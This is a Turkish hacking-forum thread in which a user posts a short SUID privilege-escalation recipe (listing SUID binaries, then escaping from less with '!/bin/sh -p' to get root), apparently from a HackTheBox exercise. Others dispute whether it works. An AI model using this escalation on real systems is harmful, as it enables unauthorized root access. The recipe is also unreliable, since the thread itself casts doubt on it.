How To Abuse SUID To Get Root

[HaCkEr_33]

1. ls -la $(which passwd)
2. ls -la /etc/shadow
3. find / -perm -4000 2>/dev/null
4. 
   
5. touch subscribe
6. 
   
7. less subscribe
8. 
   
9. boş çıkacak yere !/bin/sh -p yazıyoruz ve artık sunucuda rootuz

 

[Ensigma]

Çox sağ ol

 

[Can]

eline sağlık kardeşim

 

[RootAyyıldız]

merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
​

• ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
• ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
• find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
• ​
• touch subscribe (touch ile dosya oluşturulur)​
• ​
• less subscribe (less ile okuma işlemi yaparsın )​
• Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​

 

[Can]

merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
​

• ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
• ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
• find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
• ​
• touch subscribe (touch ile dosya oluşturulur)​
• ​
• less subscribe (less ile okuma işlemi yaparsın )​
• Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​

1. ls -la $(which passwd)
2. ls -la /etc/shadow
3. find / -perm -4000 2>/dev/null
4. 
   
5. touch subscribe
6. 
   
7. less subscribe
8. 
   
9. boş çıkacak yere !/bin/sh -p yazıyoruz ve artık sunucuda rootuz

ikinizinde ellerine sağlık

 

[HaCkEr_33]

merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
​

• ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
• ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
• find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
• ​
• touch subscribe (touch ile dosya oluşturulur)​
• ​
• less subscribe (less ile okuma işlemi yaparsın )​
• Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​

Anladim root Ayyildiz kanka ama ben bu metodu ctf cozerken bir makinaya sizarken araştırdigimda yapmiştim sunucuda root olmuştum oyüzden not aldıgım için paylaşayım dedim

 

[RootAyyıldız]

Anladim root Ayyildiz kanka ama ben bu metodu ctf cozerken bir makinaya sizarken araştırdigimda yapmiştim sunucuda root olmuştum oyüzden not aldıgım için paylaşayım dedim

çözdügün ctf ismini atarmısın incelemek isterim

 

[B4rbarossa]

çözdügün ctf ismini atarmısın incelemek isterim

 

[HaCkEr_33]

çözdügün ctf ismini atarmısın incelemek isterim

HackTheBox Lame

 

[HaCkEr_33]

merhaba sevgili dostum Hacker_33 nasılsın iyimisin hayırlı forumlar dilemek isterim öncelikle komutları teker teker açıklayalım
​

• ls -la $(which passwd) (bulundugun dizindeki hereyi görürsün gördügün hereyin yazma okuma gibi izinlerinide görürüsn)​
• ls -la /etc/shadow (diyerek /etc/shadow shadow dosyasının izinlerini görürüsün)​
• find / -perm -4000 2>/dev/null (find komutu bulma komutudur burada sen aygıt dizindeki stream dosyasında belirtigin permisonda arama yapıyorsun )​
• ​
• touch subscribe (touch ile dosya oluşturulur)​
• ​
• less subscribe (less ile okuma işlemi yaparsın )​
• Burada Yaptıgın İşlemler ile bir sunucuda root yetkisi alamaman lazım zira bir kullanıcının yetkisini yükseltecek her hangi bir kelime görmedim​

Bunlari komutlarin anlamini izledigim videoda adam anlatiyodu ordan biliyorum , ama tam olarak mantigini anlamamıştım doğruyu söylemek gerekirse . HackTheBoxda Lame makinasini cozdugumde bu komutlari kullandim.

 

[RootAyyıldız]

Bunlari komutlarin anlamini izledigim videoda adam anlatiyodu ordan biliyorum , ama tam olarak mantigini anlamamıştım doğruyu söylemek gerekirse . HackTheBoxda Lame makinasini cozdugumde bu komutlari kullandim.

merhaba sevgili dostum makineyi az önce inceleme firsatı buldum makinen rootlanma yetki yükseltme gibi bi durumu yok sadece samba servisinde bulunan bir zafiyet ile makineye giriyorsun multi/samba/usermap_script exploitini kullanarak zaten makineye girdiginde id verdiginde root olarak giriyorsun her hangi bir yetki yükseltme durumu göremedim galiba yalnış bir makine ismi söyledin

 

[HaCkEr_33]

merhaba sevgili dostum makineyi az önce inceleme firsatı buldum makinen rootlanma yetki yükseltme gibi bi durumu yok sadece samba servisinde bulunan bir zafiyet ile makineye giriyorsun multi/samba/usermap_script exploitini kullanarak zaten makineye girdiginde id verdiginde root olarak giriyorsun her hangi bir yetki yükseltme durumu göremedim galiba yalnış bir makine ismi söyledin

id degerini verdigimde yada whoami komutunu verdigimde beni root kullanicisinda karşılamadı bende internette biraz araştırdım root metodunu birkaçını denedim olmadı , en sonda bu videoyu bulup yaptım root yetkisine yükseldim makina değişmişde ola bilir içeriği birazdan yeniden bakarım ben ona

 

[RootAyyıldız]

id degerini verdigimde yada whoami komutunu verdigimde beni root kullanicisinda karşılamadı bende internette biraz araştırdım root metodunu birkaçını denedim olmadı , en sonda bu videoyu bulup yaptım root yetkisine yükseldim makina değişmişde ola bilir içeriği birazdan yeniden bakarım ben ona

izlediğin video yu atabilirmisin

 

[HaCkEr_33]

izlediğin video yu atabilirmisin

olur buyur:

PS: Videoyu Sildiler

 

[RootAyyıldız]

video gizli görülmüyor

olur buyur:

 

[HaCkEr_33]

video gizli görülmüyor

yeni farkettim kanka videoyu silmişler buna uygun birisini aratiyim bulursam atarım sana yeniden

 

[RootAyyıldız]

yeni farkettim kanka videoyu silmişler buna uygun birisini aratiyim bulursam atarım sana yeniden